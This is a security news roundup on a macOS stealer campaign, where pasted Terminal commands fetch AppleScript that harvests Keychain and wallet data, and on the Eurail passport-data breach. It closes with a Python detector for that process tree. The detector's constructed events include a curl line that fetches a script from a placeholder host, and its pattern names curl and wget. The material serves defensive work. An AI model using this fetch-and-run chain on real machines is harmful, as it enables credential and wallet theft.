Two new security incidents

Security researchers flagged a macOS phishing campaign that uses fake Apple sites and AppleScript to deploy Atomic Stealer, and a separate breach exposed about 300,000 Eurail customers’ data from misconfigured cloud services. The macOS campaign targets Keychain and wallets, while the Eurail leak included names and passports posted on the dark web. Together these incidents underline persistent risks from both targeted malware and cloud‑configuration errors. (x.com, x.com)

A Mac can now be tricked with something as simple as a fake installer page that tells you to paste one command into Terminal, and that single paste can hand over browser logins, Keychain secrets, and cryptocurrency wallet data. CloudSEK says one recent campaign used a fake macOS cloud-storage site to deliver a script-driven stealer called MacSync. (cloudsek.com)

Terminal is the text-only control panel built into macOS, and attackers like it because one copied command can do the work of a full app installer. In the MacSync case, the pasted command launched a Z shell script, fetched AppleScript from a remote server, and then started harvesting credentials and files. (cloudsek.com)

AppleScript is Apple’s own automation language, meant for harmless jobs like moving files or clicking buttons, which makes it useful cover for malware. CloudSEK says the stolen password from the fake prompts let the script dig into Keychain, which is macOS’s built-in password vault, and pull out saved credentials and wallet data. (cloudsek.com)

Atomic macOS Stealer, often shortened to Atomic Stealer or AMOS, is one of several information-stealing tools built specifically for Mac users. SentinelOne said Atomic Stealer can collect account passwords, browser data, session cookies, and cryptocurrency wallets, and Moonlock reported in March 2026 that another live campaign was disguising the malware as an artificial intelligence app for Mac users. (sentinelone.com, moonlock.com)

That is why fake Apple pages work so well: the attack does not need a deep software flaw if it can borrow Apple’s look and ask the victim to do the dangerous step themselves. Moonlock said one Atomic Stealer operation pushed a disk image file named “Cleal_AI.dmg” through an impersonation site and promoted it with a social-media account created in February 2025. (moonlock.com)

The Eurail breach is the opposite kind of problem: no phishing page, no pasted command, just customer data sitting in the wrong place inside cloud systems. SecurityWeek reported on April 9, 2026 that more than 300,000 people are being notified after a December 2025 Eurail breach exposed personal information taken from the Netherlands-based rail-pass company’s network. (securityweek.com)

When Eurail first disclosed the incident in January 2026, the company said an unauthorized person had accessed part of its customer database. Eurail community posts and later reporting said the stolen fields included first and last names, dates of birth, email addresses, home addresses, telephone numbers, passport numbers, passport issuing country, and passport expiration date. (community.eurail.com, securityweek.com)

Some of the worst records belonged to DiscoverEU travelers, who get rail passes through a European Union youth program. The European Commission said on January 13, 2026 that affected DiscoverEU data could also include copies of passports or identity cards, bank account reference numbers, and health data. (youth.europa.eu, securityweek.com)

By mid-February, Eurail’s position had shifted from “no evidence of misuse” to confirmation that some of the stolen data was being offered for sale on the dark web and that a sample had been posted on Telegram. Security Affairs reported that update on February 17, 2026 after Eurail acknowledged the sale. (securityaffairs.com)

Put together, the two incidents show the two oldest ways to lose data in 2026: one person is fooled into running a command on their own Mac, or one company leaves sensitive records exposed in cloud systems until someone finds them. In one case the target is your password vault and wallet app; in the other it is your passport record sitting in a travel database. (cloudsek.com, securityweek.com)
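
The MacSync chain described above (a command pasted into Terminal starts a Z shell script that fetches AppleScript from a remote server) leaves a recognizable process tree. The following added example, which is not code from CloudSEK or the other cited reports, flags that shape in process-start events; the event tuple format, the sample events and the function name `find_paste_and_run` are assumptions made for illustration.

```python
# Constructed process-start events: (pid, ppid, name, cmdline). Not real telemetry.
EVENTS = [
    (100, 1, "Terminal", "Terminal"),
    (101, 100, "zsh", "-zsh"),
    (102, 101, "zsh", "zsh -c <pasted one-liner>"),
    (103, 102, "curl", "curl -fsSL https://example.invalid/script"),
    (104, 102, "osascript", "osascript"),
    (200, 1, "Terminal", "Terminal"),           # benign: local AppleScript, no fetch
    (201, 200, "zsh", "-zsh"),
    (202, 201, "osascript", "osascript -e 'display dialog \"hi\"'"),
    (300, 1, "backupd", "backupd"),             # benign: fetch outside Terminal
    (301, 300, "curl", "curl -O https://example.invalid/file.zip"),
]
SHELLS = {"zsh", "bash", "sh"}
FETCHERS = {"curl", "wget"}

def find_paste_and_run(events):
    """Return pids of the innermost Terminal-descended shells whose subtree
    contains both a network fetcher and osascript."""
    info = {pid: (ppid, name) for pid, ppid, name, _ in events}
    kids = {}
    for pid, ppid, _, _ in events:
        kids.setdefault(ppid, []).append(pid)

    def subtree(pid):
        out, stack = [], list(kids.get(pid, []))
        while stack:
            p = stack.pop()
            out.append(p)
            stack.extend(kids.get(p, []))
        return out

    def under_terminal(pid):
        # Walk up the parent chain until it leaves the recorded events.
        while pid in info:
            pid, name = info[pid]
            if name == "Terminal":
                return True
        return False

    def suspicious(pid):
        names = {info[d][1] for d in subtree(pid)}
        return (info[pid][1] in SHELLS and under_terminal(pid)
                and bool(names & FETCHERS) and "osascript" in names)

    hits = [p for p in info if suspicious(p)]
    # Keep only the tightest subtree: drop a shell if a descendant shell also matches.
    return sorted(p for p in hits if not any(d in hits for d in subtree(p)))

if __name__ == "__main__":
    print(find_paste_and_run(EVENTS))
```

Reporting only the innermost matching shell keeps a long-lived login shell from being flagged for unrelated `curl` and `osascript` runs made at different times in the same session.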
